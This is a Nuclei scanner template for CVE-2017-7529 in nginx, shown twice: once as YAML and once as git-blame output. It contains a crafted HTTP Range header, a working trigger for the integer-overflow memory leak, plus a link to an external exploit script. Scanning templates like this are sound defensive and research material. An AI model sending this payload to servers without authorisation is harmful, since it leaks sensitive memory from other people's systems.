nuclei-templates/cves/CVE-2017-7529.yaml

id: CVE-2017-7529
info:
  author: "Harsh Bothra & @dwisiswant0"
  name: "Nginx Remote Integer Overflow"
  severity: medium
  description: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.

  # This template supports the detection part only.
  # Do not test any website without permission
  # https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Range: bytes=-17208,-9223372036854758792
        Connection: close
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 206
      - type: word
        words:
          - "Server: nginx"
          - "Content-Range"
        condition: and
        part: header
drafting cve 2020-08-30 04:27:07 +00:00			`id: CVE-2017-7529`
			`info:`
:hammer: Add server matcher 2020-08-30 04:58:14 +00:00			`author: "Harsh Bothra & @dwisiswant0"`
drafting cve 2020-08-30 04:27:07 +00:00			`name: "Nginx Remote Integer Overflow"`
			`severity: medium`
			`description: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.`

:hammer: Add server matcher 2020-08-30 04:58:14 +00:00			`# This template supports the detection part only.`
			`# Do not test any website without permission`
			`# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py`
drafting cve 2020-08-30 04:27:07 +00:00
			`requests:`
			`- raw:`
			`- \|`
:hammer: Add server matcher 2020-08-30 04:58:14 +00:00			`GET / HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8`
			`Accept-Language: en-US,en;q=0.5`
			`Range: bytes=-17208,-9223372036854758792`
			`Connection: close`
drafting cve 2020-08-30 04:27:07 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 206`
			`- type: word`
			`words:`
:hammer: Add server matcher 2020-08-30 04:58:14 +00:00			`- "Server: nginx"`
			`- "Content-Range"`
:hammer: Add 'and' condition 2020-08-30 05:04:34 +00:00			`condition: and`
drafting cve 2020-08-30 04:27:07 +00:00			`part: header`